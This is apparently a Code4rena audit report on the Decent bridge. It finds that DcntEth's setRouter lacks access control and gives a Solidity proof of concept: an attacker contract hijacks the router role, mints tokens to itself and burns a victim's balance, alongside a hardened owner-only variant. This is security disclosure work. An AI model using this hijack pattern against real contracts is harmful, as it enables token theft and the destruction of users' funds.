Decent - darksnow's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH


Findings Distribution

Researcher Performance

Rank: 74/113

Findings: 1

Award: $0.12

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20-L30

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DecentEthRouter.sol#L301-L335

Vulnerability details

Impact

The setRouter function of DcntEth has no access control, so any account can change the router address and disrupt the protocol.

Anyone can set their own address as the router and then call the mint and burn functions of DcntEth, which are guarded only by the onlyRouter modifier.

In addition, once the router address has been changed, the legitimate DecentEthRouter no longer passes the onlyRouter check, so the following DecentEthRouter functions, which rely on DcntEth's mint and burn, stop working:

  • addLiquidityEth
  • removeLiquidityEth
  • addLiquidityWeth
  • removeLiquidityWeth

Proof of Concept

After the attacker calls setRouter(attackerAddress), their address is the router, so they can:

  1. call mint(attackerAddress, anyAmount), passing the onlyRouter check and minting arbitrary DcntEth to themselves
  2. call burn(victimAddress, victimBalance), passing the onlyRouter check and destroying any victim's balance
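The attack sequence above, as an added illustrative example that is not the project's code: a minimal stand-in for DcntEth with the unprotected setRouter, an attacker contract that runs the two steps in one transaction, the hardened variant with the owner-only restriction, and a small harness that shows the attack succeeding against the first and reverting against the second. The contract names (IDcntEthLike, DcntEthBase, VulnerableDcntEth, HardenedDcntEth, RouterHijacker, Demo), the compiler version and the simplified balance bookkeeping are assumptions; only setRouter, mint, burn and the onlyRouter modifier come from the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative example only (not decent-bridge code); names are assumed.
interface IDcntEthLike {
    function setRouter(address _router) external;
    function mint(address to, uint256 amount) external;
    function burn(address from, uint256 amount) external;
    function balanceOf(address who) external view returns (uint256);
}

// Shared bookkeeping plus the router-gated mint/burn the finding concerns.
abstract contract DcntEthBase is IDcntEthLike {
    address public router;
    mapping(address => uint256) public balanceOf;

    modifier onlyRouter() {
        require(msg.sender == router, "only router");
        _;
    }

    function mint(address to, uint256 amount) external onlyRouter {
        balanceOf[to] += amount;
    }

    function burn(address from, uint256 amount) external onlyRouter {
        balanceOf[from] -= amount;
    }
}

// As reported: setRouter has no access control at all.
contract VulnerableDcntEth is DcntEthBase {
    function setRouter(address _router) external {
        router = _router;
    }
}

// Mitigation from the report: only the owner may change the router.
contract HardenedDcntEth is DcntEthBase {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "only owner");
        _;
    }

    function setRouter(address _router) external onlyOwner {
        router = _router;
    }
}

// Runs the proof of concept: hijack the router role, then mint and burn.
contract RouterHijacker {
    function attack(IDcntEthLike token, address victim) external {
        token.setRouter(address(this));              // become the router
        token.mint(address(this), 1_000_000 ether);  // step 1: mint to self
        token.burn(victim, token.balanceOf(victim)); // step 2: burn a victim
    }
}

// Harness: Demo plays the legitimate router (and the owner of the hardened token).
contract Demo {
    function run() external returns (bool vulnerableHijacked, bool hardenedResisted) {
        address victim = address(0xBEEF);
        RouterHijacker hijacker = new RouterHijacker();

        VulnerableDcntEth vuln = new VulnerableDcntEth();
        vuln.setRouter(address(this));
        vuln.mint(victim, 10 ether);
        hijacker.attack(vuln, victim);
        // The legitimate router is now locked out of mint (and so of the
        // liquidity functions that depend on it): this call must fail.
        (bool legitMintOk, ) = address(vuln).call(abi.encodeCall(vuln.mint, (victim, 1 ether)));
        vulnerableHijacked = vuln.router() == address(hijacker)
            && vuln.balanceOf(address(hijacker)) == 1_000_000 ether
            && vuln.balanceOf(victim) == 0
            && !legitMintOk;

        HardenedDcntEth hard = new HardenedDcntEth();
        hard.setRouter(address(this));
        hard.mint(victim, 10 ether);
        // setRouter from the attacker reverts with "only owner", so nothing changes.
        try hijacker.attack(hard, victim) {
            hardenedResisted = false;
        } catch {
            hardenedResisted = hard.router() == address(this) && hard.balanceOf(victim) == 10 ether;
        }
    }
}
```

Deploy Demo and call run(): it returns (true, true). The first flag confirms every consequence listed in the report against the unprotected token, including the legitimate router being rejected by onlyRouter afterwards; the second confirms that an owner-only setRouter stops the hijack without changing how mint and burn are guarded.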

Tools Used

Manual review.

Recommended Mitigation Steps

setRouter should be restricted with an onlyOwner modifier (or equivalent access control) so that only the contract owner can change the router address.

Assessed type

Access Control

#0 - c4-pre-sort

2024-01-23T21:18:09Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-23T21:18:16Z

raymondfam marked the issue as duplicate of #14

#2 - c4-judge

2024-02-03T13:31:49Z

alex-ppg marked the issue as satisfactory
